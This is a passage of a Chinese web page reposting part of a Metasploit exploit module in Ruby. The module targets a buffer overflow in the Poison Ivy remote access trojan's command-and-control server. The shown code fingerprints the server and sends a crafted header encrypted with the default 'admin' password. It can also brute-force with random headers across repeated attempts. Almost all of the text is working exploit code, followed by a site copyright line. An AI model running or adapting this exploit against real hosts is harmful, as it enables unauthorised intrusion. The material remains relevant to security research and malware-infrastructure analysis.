Poison Ivy 'CC'服务器缓冲区溢出漏洞(3)

register_advanced_options(
            [
                OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 2 ]),
            ], self.class)

end

def check
        sig = "\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b"
        lensig = [0x000015D0].pack("V")

connect
        sock.put("\x00" * 256)
        response = sock.read(256)
        datalen = sock.read(4)
        disconnect

if datalen == lensig
            if response[0, 16] == sig
                print_status("Password appears to be \"admin\"")
            else
                print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.")
            end
            return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
    end

def single_exploit
        if datastore['RANDHEADER'] == true
            # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
            header = rand_text(0x20)
        else
            # This is the 32-byte header we want to send, encrypted with the default password ("admin")
            # We have a very good chance of succeeding even if the password was changed
            header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
        end
        do_exploit(header)
    end

def brute_exploit(brute_target)
        if brute_target['Try'] == 1
            print_status("Bruteforcing - Try #{brute_target['Try']}: Header for 'admin' password")
            # This is the 32-byte header we want to send, encrypted with the default password ("admin")
            # We have a very good chance of succeeding even if the password was changed
            header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
        else
            print_status("Bruteforcing - Try #{brute_target['Try']}: Random Header")
            # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
            header = rand_text(0x20)
        end
        do_exploit(header)
    end

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwyffg.html